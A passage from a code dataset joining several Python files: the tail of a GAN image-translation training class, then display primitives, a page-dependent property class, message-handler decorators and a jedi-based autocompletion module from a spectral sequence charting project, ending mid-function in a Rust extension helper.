        is not returned). Also calls l_d_total.backward() to compute the gradients.
"""
l_d_total = 0
with self.cast():
l_d_total, gan_logs = self.adversarial(
fake, real, netD=netD,
stage='discriminator', fsfilter=self.f_high)
for g_log in gan_logs:
log_dict[g_log] = gan_logs[g_log]
l_d_total /= self.accumulations
# calculate gradients
if self.amp:
# call backward() on scaled loss to create scaled gradients.
self.amp_scaler.scale(l_d_total).backward()
else:
l_d_total.backward()
# return l_d_total
return log_dict
def backward_D_T(self):
"""Calculate GAN loss for texture discriminator D_T"""
fake_gray = self.fake_T_pool.query(self.fake_gray)
self.log_dict_T = self.backward_D_Basic(
self.netD_T, self.real_gray, fake_gray, self.log_dict_T)
# aggregate logs to global logger
for kls_T, vls_T in self.log_dict_T.items():
self.log_dict[f'{kls_T}_T'] = vls_T # * self.text_w
def backward_D_S(self):
"""Calculate GAN loss for surface discriminator D_S"""
fake_blur = self.fake_S_pool.query(self.fake_blur)
self.log_dict_S = self.backward_D_Basic(
self.netD_S, self.real_blur, fake_blur, self.log_dict_S)
# aggregate logs to global logger
for kls_S, vls_S in self.log_dict_S.items():
self.log_dict[f'{kls_S}_S'] = vls_S # * self.surf_w
def backward_G(self):
"""Calculate the loss for generator G"""
# prepare losses and image pairs
rep_names = ['surf', 'text', 'struct', 'cont', 'reg']
selectors = [self.surf_losses, self.text_losses,
self.struct_losses, self.cont_losses, self.reg_losses]
sel_fakes = [self.fake_blur, self.fake_gray,
self.fake_B, self.fake_B, self.fake_B]
sel_reals = [self.real_blur, self.real_gray,
self.sp_real, self.real_A, self.real_B]
rep_ws = [self.surf_w, self.text_w,
self.stru_w, self.cont_w, self.reg_w]
l_g_total = 0
# l_g_total = torch.zeros(1) # 0
with self.cast():
if self.lambda_idt and self.lambda_idt > 0:
self.idt_B = self.netG(self.real_B)
log_idt_dict = OrderedDict()
# Identity loss (fp16)
if self.lambda_idt and self.lambda_idt > 0 and self.idt_losses:
# G should be identity if real_B is fed: ||G(B) - B|| = 0
loss_idt_B, log_idt_dict = self.generatorlosses(
self.idt_B, self.real_B, log_idt_dict,
self.f_low, selector=self.idt_losses)
l_g_total += sum(loss_idt_B) * self.lambda_idt / self.accumulations
for kidt_B, vidt_B in log_idt_dict.items():
self.log_dict[f'{kidt_B}_idt'] = vidt_B
if self.cri_gan:
# texture adversarial loss
l_g_gan_T = self.adversarial(
self.fake_gray, self.real_gray, netD=self.netD_T,
stage='generator', fsfilter=self.f_high)
self.log_dict_T['l_g_gan'] = l_g_gan_T.item()
l_g_total += self.text_w * l_g_gan_T / self.accumulations
# surface adversarial loss
l_g_gan_S = self.adversarial(
self.fake_blur, self.real_blur, netD=self.netD_S,
stage='generator', fsfilter=self.f_high)
self.log_dict_S['l_g_gan'] = l_g_gan_S.item()
l_g_total += self.surf_w * l_g_gan_S / self.accumulations
# calculate remaining losses
for sn, fake, real, sel, w in zip(
rep_names, sel_fakes, sel_reals, selectors, rep_ws):
if not sel:
continue
loss_results, log_dict = self.generatorlosses(
fake, real, {}, self.f_low, selector=sel)
l_g_total += w * sum(loss_results) / self.accumulations
for ksel, vsel in log_dict.items():
self.log_dict[f'{ksel}_{sn}'] = vsel # * w
# high precision generator losses (can be affected by AMP half precision)
if self.precisegeneratorlosses.loss_list:
if self.lambda_idt and self.lambda_idt > 0 and self.idt_losses:
# Identity loss (precise losses)
# G should be identity if real_B is fed: ||G(B) - B|| = 0
precise_loss_idt_B, log_idt_dict = self.precisegeneratorlosses(
self.idt_B, self.real_B, log_idt_dict,
self.f_low, selector=self.idt_losses)
l_g_total += sum(precise_loss_idt_B) * self.lambda_idt / self.accumulations
for kidt_B, vidt_B in log_idt_dict.items():
self.log_dict[f'{kidt_B}_idt'] = vidt_B
for sn, fake, real, sel, w in zip(
rep_names, sel_fakes, sel_reals, selectors, rep_ws):
if not sel:
continue
precise_loss_results, log_dict = self.precisegeneratorlosses(
fake, real, {}, self.f_low, selector=sel)
l_g_total += w * sum(precise_loss_results) / self.accumulations
for ksel, vsel in log_dict.items():
self.log_dict[f'{ksel}_{sn}'] = vsel # * w
# calculate gradients
if self.amp:
# call backward() on scaled loss to create scaled gradients.
self.amp_scaler.scale(l_g_total).backward()
else:
l_g_total.backward()
def optimize_parameters(self, step):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
# batch (mixup) augmentations
aug = None
if self.mixup:
self.real_B, self.real_A, mask, aug = BatchAug(
self.real_B, self.real_A,
self.mixopts, self.mixprob, self.mixalpha,
self.aux_mixprob, self.aux_mixalpha, self.mix_p
)
# run G(A)
with self.cast(): # casts operations to mixed precision if enabled, else nullcontext
self.forward() # compute fake images: G(A)
# batch (mixup) augmentations
# cutout-ed pixels are discarded when calculating loss by masking removed pixels
if aug == "cutout":
self.fake_B, self.real_B = self.fake_B*mask, self.real_B*mask
if self.cri_gan:
# update D_T and D_S
self.requires_grad(self.netD_T, True) # enable backprop for D_T
self.requires_grad(self.netD_S, True) # enable backprop for D_S
if isinstance(self.feature_loc, int):
# freeze up to the selected layers
for loc in range(self.feature_loc):
self.requires_grad(self.netD_T, False, target_layer=loc, net_type='D')
self.requires_grad(self.netD_S, False, target_layer=loc, net_type='D')
self.backward_D_T() # calculate gradients for D_T
            self.backward_D_S() # calculate gradients for D_S
# only step and clear gradient if virtual batch has completed
if (step + 1) % self.accumulations == 0:
if self.amp:
self.amp_scaler.step(self.optimizer_D)
self.amp_scaler.update()
else:
self.optimizer_D.step() # update D_T and D_S's weights
self.optimizer_D.zero_grad() # set D_T and D_S's gradients to zero
self.optDstep = True
# update G
if self.cri_gan:
# Ds require no gradients when optimizing G
self.requires_grad(self.netD_T, flag=False, net_type='D')
self.requires_grad(self.netD_S, flag=False, net_type='D')
        self.backward_G() # calculate gradients for G
# only step and clear gradient if virtual batch has completed
if (step + 1) % self.accumulations == 0:
if self.amp:
self.amp_scaler.step(self.optimizer_G)
self.amp_scaler.update()
else:
                self.optimizer_G.step() # update G's weights
self.optimizer_G.zero_grad() # set G's gradients to zero
self.optGstep = True
def get_current_log(self):
"""Return traning losses / errors. train.py will print out these on the
console, and save them to a file"""
return self.log_dict
def get_current_visuals(self):
"""Return visualization images. train.py will display and/or save these images"""
out_dict = OrderedDict()
for name in self.visual_names:
if isinstance(name, str):
out_dict[name] = getattr(self, name).detach()[0].float().cpu()
return out_dict
``` |
{
"source": "JoeyBF/sseq",
"score": 3
} |
#### File: python/spectralsequence_chart/display_primitives.py
```python
from typing import Union, List
UUID_str = str
DashPattern = List[int]
LineWidth = float
from .css_colors import CSS_COLORS_JSON
class Color:
""" Represents a color in RGBA colorspace. Each channel should be an integer from 0 to 255, values outside of this range will be clipped.
"""
CSS_COLORS = None
def __init__(self, r : int, g : int, b : int, a : int = 255):
"""
Args:
            r (int): The red color channel.
            g (int): The green color channel.
            b (int): The blue color channel.
            a (int): The alpha / transparency color channel.
"""
self._name = None
self._color = tuple(min(max(int(s), 0),255) for s in (r, g, b, a))
@staticmethod
def from_string(color : str) -> "Color":
if color.startswith("#"):
return Color.from_hex(color)
if color in Color.CSS_COLORS:
return Color.CSS_COLORS[color]
raise ValueError(f"Unrecognized color '{color}'")
@staticmethod
def from_hex(hex_str : str) -> "Color":
assert hex_str.startswith("#")
assert len(hex_str) == 7 or len(hex_str) == 9
parts = [hex_str[1:3], hex_str[3:5], hex_str[5:7]]
if len(hex_str) == 9:
parts.append(hex_str[7:])
parts = [int(s, 16) for s in parts]
return Color(*parts)
def to_hex(self) -> str:
return "#" + "".join([hex(s)[2:].zfill(2) for s in self._color])
def lerp(self, other : "Color", t : float) -> "Color":
""" Linearly interpolate between two colors.
Returns:
t * self + (1-t) * other.
"""
        return Color(*(self._color[i] * t + other._color[i] * (1 - t) for i in range(4)))
def to_json(self):
result = dict(
type=type(self).__name__,
color= self.to_hex()
)
if self._name:
result["name"] = self._name
return result
@classmethod
def from_json(cls, json):
assert json["type"] == cls.__name__
result = Color.from_hex(json["color"])
result._name = json.get("name")
return result
def __repr__(self):
if self._name:
return f'Color("{self._name}")'
return f'Color("{self.to_hex()}")'
Color.CSS_COLORS = {}
for (name, value) in CSS_COLORS_JSON.items():
c = Color.from_hex(value)
c._name = name
Color.CSS_COLORS[name] = c
Color.CSS_COLORS["transparent"] = Color(0,0,0,0)
Color.CSS_COLORS["transparent"]._name = "transparent"
class ArrowTip:
""" An ArrowTip. Curently the only possible arrow tip is the standard one.
TODO: support for hook, some parameters.
"""
def __init__(self, tip="standard"):
self._tip = tip
# @property
# def tip(self):
# return self._tip
def to_json(self):
return dict(
type=type(self).__name__,
tip = self._tip,
)
@staticmethod
def from_json(json):
assert json.pop("type") == ArrowTip.__name__
return ArrowTip(**json)
def __repr__(self):
return f"ArrowTip('{self._tip}')"
from copy import deepcopy
class Shape:
""" A Shape. A Shape has three components: a background, a foreground, and a border (some of these may be empty).
The shape can be iteratively built up by starting with a string to be drawn at the center and wrapping it
with accents and border shapes.
If the whole shape is a single character, then the character will be rendered as the "background"
and the "border" will outline the border of the character.
If the characters are wrapped in a circle or rectangle, then the characters will be drawn in the "foreground" component,
the "background" component will consist of the interior of the bounding circle / rectangle, and the border will be the border
of the circle / rectangle.
"""
def __init__(self, character : str = None, font : str = None):
"""
TODO: Link to StixTwoMath.
Args:
character (str): The characters to render at the center of the shape.
font (str): The font to render the characters in. Currently the only supported font is "stix".
"""
self._name = None
if character:
self.dict = dict(
ty="character",
font=font or "stix",
char=character,
whole_shape=True
)
else:
self.dict = dict(ty="empty")
@staticmethod
def square(size : float):
return Shape().boxed(size)
@staticmethod
def circle(size : float):
return Shape().circled(size)
def circled(self, padding : float, num_circles : int = 1, circle_gap : float = 0, include_background : bool = True) -> "Shape":
""" Circle the existing shape with one or more circles.
Args:
padding (float): How much space to leave between the circle and the shape we are circling.
num_circles (int): How many concentric circles to draw. Because the padding is computed based on a bounding box,
repeatedly using `Shape.circled` leads to inconsistent spacing between the circles.
circle_gap (int): If num_circles > 1, how much space to leave between circles. If num_circles == 1, has no effect.
include_background (bool): If True, the background of the circle goes in the background component, if False,
the new circle makes no contribution to the background component.
"""
copy_dict = deepcopy(self.dict)
if "whole_shape" in copy_dict:
copy_dict["whole_shape"] = False
result = Shape()
result.dict = dict(
ty = "composed",
operation="circled",
padding=padding,
num_circles=num_circles,
circle_gap=circle_gap,
include_background=include_background,
innerShape=copy_dict
)
return result
def boxed(self, padding : float, include_background : bool = True) -> "Shape":
""" Box the existing shape.
Args:
padding (float): How much space to leave between the box and the shape we are boxing.
include_background (bool): If True, the background of the box goes in the background component, if False,
the new box makes no contribution to the background component.
"""
copy_dict = deepcopy(self.dict)
if "whole_shape" in copy_dict:
copy_dict["whole_shape"] = False
result = Shape()
result.dict = dict(
ty = "composed",
operation="boxed",
padding=padding,
include_background=include_background,
innerShape=copy_dict
)
return result
def to_json(self):
result = {"type" : type(self).__name__}
result.update(self.dict)
if self._name:
result["name"] = self._name
return result
@staticmethod
def from_json(json):
assert json.pop("type") == Shape.__name__
result = Shape()
if "name" in json:
result._name = json.pop("name")
result.dict = json
return result
def __repr__(self):
if self._name:
return f'Shape("{self._name}")'
return f"Shape({repr(self.dict)})"
```
#### File: python/spectralsequence_chart/page_property.py
```python
from .infinity import INFINITY
import json
from typing import List, Tuple, Any, Type, Union, TypeVar, Generic, Optional, Dict, cast, Callable
T = TypeVar('T')
class PageProperty(Generic[T]):
"""
A class to represent a property that varies depending on the pages of a spectral sequence.
This is the main helper class that encapsulates any property of a class, edge, or chart
that varies depending on the page.
Examples:
>>> p = PageProperty(1)
>>> p[4] = 7
>>> p[2]
1
>>> p[4]
7
"""
def __init__(self,
value : T,
parent : Optional[Any] = None,
callback : Optional[Callable[[], None]] = None,
):
""" Initialize the PageProperty to always have value v."""
self._values : List[Tuple[int, T]] = [(0, value)]
self.set_parent(parent)
self._callback = callback
def set_parent(self, parent : Optional[Any]):
self._parent = parent
def set_callback(self, callback : Callable[[], None]):
self._callback = callback
def _needs_update(self):
if self._parent:
self._parent._needs_update()
if self._callback:
self._callback()
def _find_index(self, target_page : int) -> Tuple[int, bool]:
result_idx = None
for (idx, (page, _)) in enumerate(self._values):
if page > target_page:
break
result_idx = idx
# We need to help out the type checker here
if result_idx is None:
raise ValueError(f"Page Property indexed with negative index: {target_page}")
return (result_idx, self._values[result_idx][0] == target_page)
def __getitem__(self, x : Union[int, slice]) -> T:
stop = None
if type(x) == slice:
stop = x.stop or INFINITY
x = x.start or 0
if type(x) != int:
raise TypeError(f"Expected integer, got {type(x).__name__}.")
assert type(x) is int # Make type analysis thing happy
(idx, _) = self._find_index(x)
if stop:
(idx2, _) = self._find_index(stop - 1)
if idx != idx2:
raise ValueError("Indexed with slice but value is inconsistent across slice.")
return self._values[idx][1]
def __setitem__(self, p : Union[int, slice], v : T) -> None:
if hasattr(v, "set_parent"):
v.set_parent(self)
if type(p) is int:
self._setitem_single(p, v)
self._merge_redundant()
self._needs_update()
return
if type(p) is not slice:
raise TypeError("Excepted int or slice!")
start = p.start or 0
stop = p.stop or INFINITY
orig_value = self[stop]
(start_idx, _) = self._setitem_single(start, v)
(end_idx, hit_end) = self._find_index(stop)
if not hit_end and stop < INFINITY:
(end_idx, _) = self._setitem_single(stop, orig_value)
if stop == INFINITY:
end_idx += 1
del self._values[start_idx + 1 : end_idx]
self._merge_redundant()
self._needs_update()
def _setitem_single(self, p : int, v : T):
(idx, hit) = self._find_index(p)
if hit:
self._values[idx] = (p, v)
else:
idx += 1
self._values.insert(idx, (p, v))
return (idx, hit)
def _merge_redundant(self):
for i in range(len(self._values) - 1, 0, -1):
if self._values[i][1] == self._values[i-1][1]:
del self._values[i]
def __repr__(self) -> str:
values = ", ".join([f"{page}: {value}" for (page, value) in self._values])
return f"PageProperty{{{values}}}"
def __eq__(self, other):
if type(other) != PageProperty:
return False
return self._values == other._values
def map_values_in_place(self, f):
for i in range(len(self._values)):
(p, v) = self._values[i]
self._values[i] = (p, f(v))
def to_json(self) -> Dict[str, Any]:
if len(self._values) == 1:
return self._values[0][1]
else:
return {"type" : "PageProperty", "values" : self._values }
@staticmethod
def from_json(json_obj : Dict[str, Any]) -> "PageProperty[Any]":
result : PageProperty[Any] = PageProperty(None)
result._values = [cast(Tuple[int, Any], tuple(x)) for x in json_obj["values"]]
return result
S = TypeVar('S')
PagePropertyOrValue = Union[S, PageProperty[S]]
def ensure_page_property(v : PagePropertyOrValue[S], parent : Optional[Any] = None) -> PageProperty[S]:
if(type(v) is PageProperty):
result = v
else:
result = PageProperty(v)
if parent:
result.set_parent(parent)
return result
```
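A short usage sketch of `PageProperty` as defined above, showing how a slice assignment splits the page range and how `to_json` serializes it. The import path is assumed from the file layout and may need adjusting for a particular install.

```python
# Minimal usage sketch; import path assumed from the package layout above.
from spectralsequence_chart.page_property import PageProperty

p = PageProperty("solid")   # same value on every page
p[5:9] = "dashed"           # pages 5..8 get "dashed"; page 9 onward keeps the old value
assert p[2] == "solid"
assert p[6] == "dashed"
assert p[9] == "solid"
print(p.to_json())          # {'type': 'PageProperty', 'values': [(0, 'solid'), (5, 'dashed'), (9, 'solid')]}
```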
#### File: message_passing_tree/message_passing_tree/decorators.py
```python
from copy import copy
import functools
import inspect
import sys
import traceback
from . import ansi
from .agent import Agent
def reset_global_handlers():
global HANDLERS
HANDLERS = {
"in" : { },
"out" : { },
}
reset_global_handlers()
def subscribe_to(subs):
def helper(cls):
if subs == "*":
cls.subscriptions = set(["*"])
elif type(subs) is list:
cls.subscriptions = set(subs)
else:
raise TypeError(f"""Subscribe decorator argument expected to be either "*" or a list, not "{subs}".""")
return cls
return helper
def add_inherited_handlers(cls):
outward_handlers = {}
inward_handlers = {}
for super in cls.__bases__:
if hasattr(super, "outward_handlers") and super.outward_handlers is not None:
outward_handlers.update(super.outward_handlers)
if hasattr(super, "inward_handlers") and super.inward_handlers is not None:
inward_handlers.update(super.inward_handlers)
outward_handlers.update(cls.outward_handlers)
inward_handlers.update(cls.inward_handlers)
cls.outward_handlers = outward_handlers
cls.inward_handlers = inward_handlers
return cls
def collect_handlers(*, inherit):
def helper(cls):
cls.outward_handlers = HANDLERS["out"]
cls.inward_handlers = HANDLERS["in"]
reset_global_handlers()
if inherit:
add_inherited_handlers(cls)
return cls
return helper
def handle_inbound_messages(func):
return handle("in")(func)
def handle_outbound_messages(func):
return handle("out")(func)
handler_source_agent_argument_name = {"in" : "source_agent_path", "out" : "source_agent_id"}
def declared_at(func):
filename = inspect.getsourcefile(func)
lineno = inspect.getsourcelines(func)[1]
ctx = inspect.getframeinfo(inspect.stack()[3][0])
try:
cls = ctx.function
finally:
del ctx
return f""""{ansi.info(func.__name__)}" was declared:\n""" +\
f""" in file "{ansi.info(filename)}"\n""" +\
f""" in class "{ansi.info(cls)}"\n""" +\
f""" on line {ansi.info(lineno)}"""
def handle(in_or_out : str):
if in_or_out not in HANDLERS:
raise ValueError(f"""Second argument "in_or_out" should be "in" or "out" not "{in_or_out}".""")
def helper(func):
colored_func_name = f"{ansi.info(func.__name__)}"
func_args = inspect.getargspec(func).args
second_argument_name = handler_source_agent_argument_name[in_or_out]
def get_sample_declaration(colored_positions):
subs = [ansi.INFO]*6
for i, pos in enumerate(["async", "self", "envelope"]):
if pos in colored_positions:
subs[2*i] = ansi.CORRECTION
return f""""{colored_func_name}" should be declared as"""+\
f""" "{ansi.INFO}%sasync%s def {func.__name__}(%sself%s, %senvelope%s, ...){ansi.NOCOLOR}".""" % tuple(subs)
if not inspect.iscoroutinefunction(func):
raise TypeError(
f"""Handler method "{colored_func_name}" """ +\
f"""should be defined with the "{ansi.correction("async")}" keyword.\n""" +\
get_sample_declaration(["async"]) + "\n" +\
declared_at(func) + "\n" +\
declared_at(func)
)
prefix = "handle__"
suffix = "__a"
if not func.__name__.startswith(prefix):
raise TypeError(
f"""Handler method name "{ansi.mistake(func.__name__)}" """ +\
f"""should start with "{ansi.correction(prefix)}".""" + "\n" +\
declared_at(func)
)
if not func.__name__.endswith(suffix):
raise TypeError(
f"""Handler method name "{ansi.mistake(func.__name__)}" """ +\
f"""should end with "{ansi.correction(suffix)}".""" + "\n" +\
declared_at(func)
)
if len(func_args) < 2:
raise TypeError(
f"""Handler method "{colored_func_name}" """ +\
f"""should have at least two positional arguments.\n""" +\
get_sample_declaration(["self", "envelope"]) + "\n" +\
declared_at(func)
)
if func_args[0] != "self":
raise TypeError(
f"""The first argument of handler method "{colored_func_name}" """ +\
f"""should be named "{ansi.correction("self")}" not "{ansi.mistake(func_args[0])}".\n""" +\
get_sample_declaration(["self"]) + "\n" +\
declared_at(func)
)
if func_args[1] != "envelope":
raise TypeError(
f"""The second argument of handler function "{colored_func_name}" """ +\
f"""should be named "{ansi.correction("envelope")}" not "{ansi.mistake(func_args[1])}".\n""" +\
get_sample_declaration(["envelope"]) + "\n" +\
declared_at(func)
)
handler_cmd = get_handler_cmd(func)
wrapper = get_handler_wrapper(in_or_out, func)
HANDLERS[in_or_out][handler_cmd] = wrapper
return wrapper
return helper
# Given a function named "handle__cmd__sub_cmd__a" return "cmd.sub_cmd"
def get_handler_cmd(func):
prefix = "handle__"
if not func.__name__.startswith(prefix):
raise ValueError(f"""Method name {func.__name__} should start with "{prefix}".""")
suffix="__a"
if not func.__name__.endswith(suffix):
raise ValueError(f"""Method name {func.__name__} should end with "{suffix}".""")
result = func.__name__[len(prefix):-len(suffix)].replace("__", ".")
if result == "all":
return "*"
return result
def get_handler_wrapper(in_or_out, func_a):
async def handler_wrapper_a(self, envelope):
self.log_envelope_task(f"handle_{in_or_out}bound_method", envelope)
try:
await func_a(self,
envelope,
*envelope.msg.args, **envelope.msg.kwargs
)
except TypeError as e:
add_wrapped_func_to_stack_trace_if_necessary(e, handler_wrapper_a, func_a)
raise
if in_or_out == "out":
msg = envelope.msg
new_msg = copy(msg)
new_msg.cmd = copy(msg.cmd)
envelope.msg = new_msg
return handler_wrapper_a
class MockTraceback:
def __init__(self, tb_frame, tb_lineno):
self.tb_frame = tb_frame
self.tb_lineno = tb_lineno
self.tb_next = None
class MockFrame:
def __init__(self, code):
self.f_code = code
self.f_globals = globals()
def add_wrapped_func_to_stack_trace_if_necessary(exception, wrapper, func):
""" If either the message is wrong or the argspec of the handler function is wrong,
then we might get a TypeError reporting that the wrapped function has incorrect arguments.
By default, the resulting stacktrace only mentions "func" leaving the identity of the wrapped
function completely unclear.
If there is an error
"""
if traceback.extract_tb(exception.__traceback__)[-1].name != wrapper.__name__:
return
# exc_type, exc_instance, exc_traceback = exc_info
filename = inspect.getsourcefile(func)
lineno = inspect.getsourcelines(func)[1]
exception.extra_traceback = traceback.extract_tb(
MockTraceback(
tb_lineno=lineno,
tb_frame=MockFrame(func.__code__)
)
)
```
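A standalone sketch of the handler naming convention enforced by `handle` and `get_handler_cmd` above: a method named `handle__<cmd>__<sub_cmd>__a` is registered under the dotted command `<cmd>.<sub_cmd>`, and `handle__all__a` registers the wildcard. The specific command names below are made up for illustration.

```python
# Standalone illustration of get_handler_cmd's name-to-command mapping.
def handler_cmd_from_name(name: str) -> str:
    prefix, suffix = "handle__", "__a"
    assert name.startswith(prefix) and name.endswith(suffix)
    cmd = name[len(prefix):-len(suffix)].replace("__", ".")
    return "*" if cmd == "all" else cmd

assert handler_cmd_from_name("handle__chart__update__a") == "chart.update"
assert handler_cmd_from_name("handle__all__a") == "*"
```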
#### File: python/repl/completer.py
```python
from .handler_decorator import *
import jedi
from uuid import uuid4
from collections import OrderedDict
import re
SPHINX = re.compile(r"\s*:param\s+(?P<param>\w+):\s*(?P<doc>[^\n]+)")
EPYDOC = re.compile(r"\s*@param\s+(?P<param>\w+):\s*(?P<doc>[^\n]+)")
GOOGLE = re.compile(r"\s*[*]{0,2}(?P<param>\w+).*:\s*(?P<doc>[^\n]+)")
DOC_REGEX = [SPHINX, EPYDOC, GOOGLE]
def _param_docs(docstring, param_name):
for line in docstring.splitlines():
for regex in DOC_REGEX:
m = regex.match(line)
if not m:
continue
if m.group('param') != param_name:
continue
return m.group('doc') or ""
def format_docstring(contents):
"""Python doc strings come in a number of formats, but LSP wants markdown.
Until we can find a fast enough way of discovering and parsing each format,
we can do a little better by at least preserving indentation.
"""
if contents is None:
return contents
contents = contents.replace('\t', u'\u00A0' * 4)
contents = contents.replace(' ', u'\u00A0' * 2)
return contents
class LRU(OrderedDict):
'Limit size, evicting the least recently looked-up key when full'
def __init__(self, maxsize=5, *args, **kwdargs):
self.maxsize = maxsize
super().__init__(*args, **kwdargs)
def __getitem__(self, key):
value = super().__getitem__(key)
self.move_to_end(key)
return value
def __setitem__(self, key, value):
if key in self:
self.move_to_end(key)
super().__setitem__(key, value)
if len(self) > self.maxsize:
oldest = next(iter(self))
del self[oldest]
@collect_handlers("message_handlers")
class Completer:
def __init__(self, executor, *, uuid):
self.executor = executor
self.uuid = uuid
self.code = None
self.states = LRU()
async def handle_message_a(self, subcmd, **kwargs):
if subcmd not in self.message_handlers:
raise Exception(f'Message with unrecognized subcommand "{subcmd}"')
handler = self.message_handlers[subcmd]
await handler(self, **kwargs)
async def send_message_a(self, subcmd, subuuid, **kwargs):
await self.executor.send_message_a("complete", self.uuid, subcmd=subcmd, subuuid=subuuid, **kwargs)
@handle("signatures")
async def get_signature_help_a(self, subuuid, code, lineNumber, column):
try:
interpreter = jedi.Interpreter(code, [self.executor.namespace])
jedi_signatures = interpreter.get_signatures(line=lineNumber, column=column)
# For some reason, get_type_hint doesn't work the same on signatures as on completions...
[signatures, full_name, root] = self.get_signature_help_helper(jedi_signatures, code)
await self.send_message_a("signatures", subuuid, signatures=signatures, full_name=full_name, root=root)
except RecursionError:
await self.send_message_a("signatures", subuuid, signatures=None, full_name=None, root=None)
except KeyboardInterrupt:
pass
def get_signature_help_helper(self, jedi_signatures, code):
import jedi
if not jedi_signatures:
return [None, None, None]
s = jedi_signatures[0]
# docstring() returns a signature with fully qualified type names.
# This is ugly. get_type_hint() does better but it only works on Completion objects,
# not on Signature. Thus, we get a completion object. To do so, we ask for a completion at
# the open bracket of the current function.
completion = jedi.Interpreter(code, [self.executor.namespace]).complete(*s.bracket_start)[0]
try:
function_sig = completion.get_type_hint()
except NotImplementedError:
return [None, None, None]
[full_name, root] = self.get_fullname_root(completion)
if function_sig and completion.parent().type == "instance":
function_sig = function_sig.replace("self, ", "")
sig = {
'label': function_sig,
'documentation': format_docstring(s.docstring(raw=True))
}
# If there are params, add those
if s.params:
sig['parameters'] = [{
'label': p.name,
'documentation': _param_docs(s.docstring(), p.name)
} for p in s.params]
# We only return a single signature because Python doesn't allow overloading
sig_info = {'signatures': [sig], 'activeSignature': 0}
if s.index is not None and s.params:
# Then we know which parameter we're looking at
sig_info['activeParameter'] = s.index
return [sig_info, full_name, root]
@handle("completions")
async def get_completions_a(self, subuuid, code, lineNumber, column):
try:
self.code = code
state_id = str(uuid4())
completions = jedi.Interpreter(code, [self.executor.namespace]) \
.complete(line=lineNumber, column=column, fuzzy=True)
self.states[state_id] = completions
result = []
for comp in completions:
result.append(dict(
name=comp.name,
kind=comp.type
))
await self.send_message_a("completions", subuuid, completions=result, state_id=state_id)
except RecursionError:
await self.send_message_a("completions", subuuid, completions=[], state_id=None)
except KeyboardInterrupt:
pass
@handle("completion_detail")
async def get_completion_info_a(self, subuuid, state_id, idx):
completion = self.states[state_id][idx]
try:
# Try getting name and root for link to api docs.
# Will fail on properties.
[full_name, root] = self.get_fullname_root(completion)
if completion.type == "instance":
[docstring, signature, full_name, root] = self.get_completion_info_instance(subuuid, completion)
elif completion.type in ["function", "method"]:
[docstring, signature] = self.get_completion_info_function_or_method(subuuid, completion)
elif completion.type == "module":
signature = completion.infer()[0].full_name
docstring = completion.docstring(raw=True)
else:
signature = completion._get_docstring_signature()
docstring = completion.docstring(raw=True)
except Exception as e:
print("Error triggered during completion detail for", completion.name, "type:", completion.type)
raise
except KeyboardInterrupt:
return
# regex = re.compile('(?<!\n)\n(?!\n)', re.MULTILINE) # Remove isolated newline characters.
        remove_links = re.compile(r'`(\S*) <\S*>`')
docstring = remove_links.sub(r"`\1`", docstring)
await self.send_message_a("completion_detail", subuuid, docstring=format_docstring(docstring), signature=signature, full_name=full_name, root=root)
def get_fullname_root(self, completion):
if completion.name.startswith("_") or completion.name in ["from_json", "to_json"]:
return [None, None]
try:
full_name = completion.infer()[0].full_name
except IndexError:
return [None, None]
if not full_name or not full_name.startswith("spectralsequence_chart"):
return [None, None]
if completion.type in ["class", "module"]:
return [full_name, full_name]
root = ".".join(full_name.split(".")[:-1])
return [full_name, root]
def get_completion_info_instance(self, subuuid, completion):
""" Jedi by default does a bad job of getting the completion info for "instances".
If the instance is a property on a class with an available docstring, then we report that.
In any case, give the signature as "name: type".
"""
docstring = ""
type_string = ""
full_name = None
root = None
try:
# Jedi makes it a bit tricky to get from the Jedi wrapper object to the object it refers to...
object = completion.get_signatures()[0]._name._value.access_handle.access._obj
parent_object = completion._name._wrapped_name._parent_value.access_handle.access._obj
parent_type = type(parent_object)
object = None
from inspect import getdoc
if hasattr(parent_type, completion.name):
prop = getattr(parent_type, completion.name)
docstring = getdoc(prop)
object = prop.fget
elif type(getattr(parent_object, completion.name)) is property:
prop = getattr(parent_object, completion.name)
docstring = getdoc(prop)
object = prop.fget
if object.__module__.startswith("spectralsequence_chart"):
full_name = f"{object.__module__}.{object.__qualname__}"
root = ".".join(full_name.split(".")[:-1])
# full_name = object.full_name
if object:
from parso import parse
from inspect import getsource
# In this case, type(object).__name__ unfortunately gives "property", which isn't very descriptive.
# We would like to get the actual type, so we use parso to extract the type from the source.
# This will throw OSError for interpreter defined classes, but we don't expect many of those.
funcdef = next(parse(getsource(object)).iter_funcdefs())
type_string = funcdef.annotation.get_code()
        except (AttributeError, OSError):
pass
if type_string:
signature = f"{completion.name}: {type_string}"
else:
signature = ""
return [docstring, signature, full_name, root]
def get_completion_info_function_or_method(self, subuuid, completion):
docstring = completion.docstring(raw=True) or completion._get_docstring()
try:
            # Collect the return type signature for the method. TODO: this should only be used for completions of type "function" or "method".
# docstring() returns a signature with fully qualified type names.
# This is ugly, so we use get_type_hint() instead.
signature = completion.get_type_hint()
if completion.parent().type == "instance":
signature = signature.replace("self, ", "")
except (AttributeError, TypeError, NotImplementedError):
            signature = completion._get_docstring_signature()
return [docstring, signature]
```
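A quick sketch of the `LRU` helper defined above: an `OrderedDict` with a size cap that evicts the least recently accessed key. The import path is a guess based on the file layout and may need adjusting.

```python
from completer import LRU   # hypothetical import path; adjust to your package layout

cache = LRU(maxsize=2)
cache["a"] = 1
cache["b"] = 2
_ = cache["a"]   # touching "a" makes it most recently used
cache["c"] = 3   # exceeds maxsize, so the least recently used key ("b") is evicted
assert "a" in cache and "c" in cache and "b" not in cache
```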
#### File: python_ext/ext/__utils.py
```python
import sys
import rust_ext
def export_all_rust_names(module_path):
module = sys.modules[module_path]
rust_module = get_rust_module(module_path)
for name in getattr(rust_module, "__all__"):
setattr(module, name, getattr(rust_module, name))
def get_rust_module(module_path):
split_path = module_path.split(".")[1:]
split_path[0] = remove_prefix_if_present(split_path[0], "rust_")
rust_module_name = ".".join(split_path)
return getattr(rust_ext, rust_module_name)
def remove_prefix_if_present(s, prefix):
if s.startswith(prefix):
return s[len(prefix):]
else:
return s
```
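The helpers above map a Python package path onto a submodule of the compiled `rust_ext` extension by dropping the top-level package and stripping a leading `rust_` prefix. The sketch below reproduces just that string manipulation with made-up module names, so it runs without `rust_ext` installed.

```python
# Standalone illustration of get_rust_module's path handling (no rust_ext required).
def rust_module_name(module_path: str) -> str:
    parts = module_path.split(".")[1:]        # drop the top-level package, e.g. "ext"
    if parts[0].startswith("rust_"):
        parts[0] = parts[0][len("rust_"):]    # strip the "rust_" prefix
    return ".".join(parts)

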